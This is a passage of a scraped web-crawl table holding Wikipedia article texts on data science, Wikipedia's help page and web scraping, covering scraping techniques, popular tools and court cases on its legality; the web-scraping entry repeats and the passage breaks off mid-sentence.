prosecution, not a plaintiff. The prosecution may bring the case formally in the name of the monarch, state or government. In many Commonwealth realms, this is the king (or queen, when the monarch is female), named the Crown, abbreviated R, thus R v Defendant (orally, R against (versus) Defendant). In several U.S. states, including California, Illinois, Michigan, and New York, the prosecution of a criminal case is captioned as The People of the State of, followed by the name of the state, or People for short. 7 |
315 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_science | Data science is an interdisciplinary academic field 1 that uses statistics, scientific computing, scientific methods, processes, scientific visualization, algorithms and systems to extract or extrapolate knowledge and insights from potentially noisy, structured, or unstructured data. 2 Data science also integrates domain knowledge from the underlying application domain (e.g., natural sciences, information technology, and medicine). 3 Data science is multifaceted and can be described as a science, a research paradigm, a research method, a discipline, a workflow, and a profession. 4 Data science is "a concept to unify statistics, data analysis, informatics, and their related methods" to "understand and analyze actual phenomena" with data. 5 It uses techniques and theories drawn from many fields within the context of mathematics, statistics, computer science, information science, and domain knowledge. 6 However, data science is different from computer science and information science. Turing Award winner Jim Gray imagined data science as a "fourth paradigm" of science (empirical, theoretical, computational, and now data-driven) and asserted that "everything about science is changing because of the impact of information technology" and the data deluge. 7 8 A data scientist is a professional who creates programming code and combines it with statistical knowledge to create insights from data. 9 Data science is an interdisciplinary field 10 focused on extracting knowledge from typically large data sets and applying the knowledge and insights from that data to solve problems in a wide range of application domains. The field encompasses preparing data for analysis, formulating data science problems, analyzing data, developing data-driven solutions, and presenting findings to inform high-level decisions in a broad range of application domains. As such, it incorporates skills from computer science, statistics, information science, mathematics, data visualization, information visualization, data sonification, data integration, graphic design, complex systems, communication and business. 11 12 Statistician Nathan Yau, drawing on Ben Fry, also links data science to human computer interaction: users should be able to intuitively control and explore data. 13 14 In 2015, the American Statistical Association identified database management, statistics and machine learning, and distributed and parallel systems as the three emerging foundational professional communities. 15 Many statisticians, including Nate Silver, have argued that data science is not a new field, but rather another name for statistics. 16 Others argue that data science is distinct from statistics because it focuses on problems and techniques unique to digital data. 17 Vasant Dhar writes that statistics emphasizes quantitative data and description. In contrast, data science deals with quantitative and qualitative data (e.g., from images, text, sensors, transactions, customer information, etc.) and emphasizes prediction and action. 18 Andrew Gelman of Columbia University has described statistics as a non-essential part of data science. 19 Stanford professor David Donoho writes that data science is not distinguished from statistics by the size of datasets or use of computing and that many graduate programs misleadingly advertise their analytics and statistics training as the essence of a data-science program. He describes data science as an applied field growing out of traditional statistics. 20 In 1962, John Tukey described a field he called "data analysis", which resembles modern data science. 20 In 1985, in a lecture given to the Chinese Academy of Sciences in Beijing, C. F. Jeff Wu used the term "data science" for the first time as an alternative name for statistics. 21 Later, attendees at a 1992 statistics symposium at the University of Montpellier II acknowledged the emergence of a new discipline focused on data of various origins and forms, combining established concepts and principles of statistics and data analysis with computing. 22 23 The term "data science" has been traced back to 1974, when Peter Naur proposed it as an alternative name to computer science. 6 In 1996, the International Federation of Classification Societies became the first conference to specifically feature data science as a topic. 6 However, the definition was still in flux. After the 1985 lecture at the Chinese Academy of Sciences in Beijing, in 1997 C. F. Jeff Wu again suggested that statistics should be renamed data science. He reasoned that a new name would help statistics shed inaccurate stereotypes, such as being synonymous with accounting or limited to describing data. 24 In 1998, Hayashi Chikio argued for data science as a new, interdisciplinary concept, with three aspects: data design, collection, and analysis. 23 During the 1990s, popular terms for the process of finding patterns in datasets (which were increasingly large) included "knowledge discovery" and "data mining". 6 25 In 2012, technologists Thomas H. Davenport and DJ Patil declared "Data Scientist: The Sexiest Job of the 21st Century", 26 a catchphrase that was picked up even by major-city newspapers like the New York Times 27 and the Boston Globe. 28 A decade later, they reaffirmed it, stating that "the job is more in demand than ever with employers". 29 The modern conception of data science as an independent discipline is sometimes attributed to William S. Cleveland. 30 In a 2001 paper, he advocated an expansion of statistics beyond theory into technical areas; because this would significantly change the field, it warranted a new name. 25 "Data science" became more widely used in the next few years: in 2002, the Committee on Data for Science and Technology launched the Data Science Journal. In 2003, Columbia University launched The Journal of Data Science. 25 In 2014, the American Statistical Association's Section on Statistical Learning and Data Mining changed its name to the Section on Statistical Learning and Data Science, reflecting the ascendant popularity of data science. 31 The professional title of "data scientist" has been attributed to DJ Patil and Jeff Hammerbacher in 2008. 32 Though it was used by the National Science Board in their 2005 report "Long-Lived Digital Data Collections: Enabling Research and Education in the 21st Century", it referred broadly to any key role in managing a digital data collection. 33 There is still no consensus on the definition of data science, and it is considered by some to be a buzzword. 34 Big data is a related marketing term. 35 Data scientists are responsible for breaking down big data into usable information and creating software and algorithms that help companies and organizations determine optimal operations. 36 Data science and data analysis are both important disciplines in the field of data management and analysis, but they differ in several key ways. While both fields involve working with data, data science is more of an interdisciplinary field that involves the application of statistical, computational, and machine learning methods to extract insights from data and make predictions, while data analysis is more focused on the examination and interpretation of data to identify patterns and trends. 37 38 Data analysis typically involves working with smaller, structured datasets to answer specific questions or solve specific problems. This can involve tasks such as data cleaning, data visualization, and exploratory data analysis to gain insights into the data and develop hypotheses about relationships between variables. Data analysts typically use statistical methods to test these hypotheses and draw conclusions from the data. For example, a data analyst might analyze sales data to identify trends in customer behavior and make recommendations for marketing strategies. 37 Data science, on the other hand, is a more complex and iterative process that involves working with larger, more complex datasets that often require advanced computational and statistical methods to analyze. Data scientists often work with unstructured data such as text or images and use machine learning algorithms to build predictive models and make data-driven decisions. In addition to statistical analysis, data science often involves tasks such as data preprocessing, feature engineering, and model selection. For instance, a data scientist might develop a recommendation system for an e-commerce platform by analyzing user behavior patterns and using machine learning algorithms to predict user preferences. 38 39 While data analysis focuses on extracting insights from existing data, data science goes beyond that by incorporating the development and implementation of predictive models to make informed decisions. Data scientists are often responsible for collecting and cleaning data, selecting appropriate analytical techniques, and deploying models in real-world scenarios. They work at the intersection of mathematics, computer science, and domain expertise to solve complex problems and uncover hidden patterns in large datasets. 38 Despite these differences, data science and data analysis are closely related fields and often require similar skill sets. Both fields require a solid foundation in statistics, programming, and data visualization, as well as the ability to communicate findings effectively to both technical and non-technical audiences. Both fields benefit from critical thinking and domain knowledge, as understanding the context and nuances of the data is essential for accurate analysis and modeling. 37 38 In summary, data analysis and data science are distinct yet interconnected disciplines within the broader field of data management and analysis. Data analysis focuses on extracting insights and drawing conclusions from structured data, while data science involves a more comprehensive approach that combines statistical analysis, computational methods, and machine learning to extract insights, build predictive models, and drive data-driven decision-making. Both fields use data to understand patterns, make informed decisions, and solve complex problems across various domains. Cloud computing can offer access to large amounts of computational power and storage. 40 In big data, where volumes of information are continually generated and processed, these platforms can be used to handle complex and resource-intensive analytical tasks. 41 Some distributed computing frameworks are designed to handle big data workloads. These frameworks can enable data scientists to process and analyze large datasets in parallel, which can reducing processing times. 42 Data science involve collecting, processing, and analyzing data which often including personal and sensitive information. Ethical concerns include potential privacy violations, bias perpetuation, and negative societal impacts 43 44 Machine learning models can amplify existing biases present in training data, leading to discriminatory or unfair outcomes. 45 46 |
316 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Help:Contents | This page provides help with the most common questions about Wikipedia. You can also search Wikipedia's help pages using the search box below, or browse the Help menu or the Help directory. The Readers' FAQ and our about page contain the most commonly sought information about Wikipedia. For simple searches, there is a search box at the top of every page. Type what you are looking for in the box. Partial matches will appear in a dropdown list. Select any page in the list to go to that page. Or, select the magnifying glass "Go" button, or press Enter, to go to a full search result. For advanced searches, see Help:Searching. There are other ways to browse and explore Wikipedia articles; many can be found at Wikipedia:Contents. See our disclaimer for cautions about Wikipedia's limitations. For mobile access, press the mobile view link at the very bottom of every desktop view page. Contributing is easy: see how to edit a page. For a quick summary on participating, see contributing to Wikipedia, and for a friendly tutorial, see our introduction. For a listing of introductions and tutorials by topic, see getting started. The Simplified Manual of Style and Cheatsheet can remind you of basic wiki markup. Be bold in improving articles When adding facts, please provide references so others may verify them. If you are affiliated with the article subject, please see our conflict of interest guideline. The simple guide to vandalism cleanup can help you undo malicious edits. If you're looking for places you can help out, the Task Center is the place to go, or check out what else is happening at the community portal. You can practice editing and experiment in a sandboxyour sandbox. If there is a problem with an article about yourself, a family member, a friend or a colleague, please read Biographies of living persons Help. If you spot a problem with an article, you can fix it directly, by clicking on the "Edit" link at the top of that page. See the "edit an article" section of this page for more information. If you don't feel ready to fix the article yourself, post a message on the article's talk page. This will bring the matter to the attention of others who work on that article. There is a "Talk" link at the beginning of every article page. You can contact us. If it's an article about you or your organization, see Contact us Subjects. Check Your first article to see if your topic is appropriate, then the Article wizard will walk you through creating the article. Once you have created an article, see Writing better articles for guidance on how to improve it and what to include (like reference citations). For contributing images, audio or video files, see the Introduction to uploading images. Then the Upload wizard will guide you through that process. Answers to common problems can be found at frequently asked questions. Or check out where to ask questions or make comments. New users should seek help at the Teahouse if they're having problems while editing Wikipedia. More complex questions can be posed at the Help desk. Volunteers will respond as soon as they're able. Or ask for help on your talk page and a volunteer will visit you there You can get live help with editing in the help chatroom. For help with technical issues, ask at the Village pump. If searching Wikipedia has not answered your question (for example, questions like "Which country has the world's largest fishing fleet? ), try the Reference Desk. Volunteers there will attempt to answer your questions on any topic, or point you toward the information you need. There are two ways to create subcategories. Search Frequently Asked Questions Search the help desk archives |
317 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-8 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
318 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-6 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for 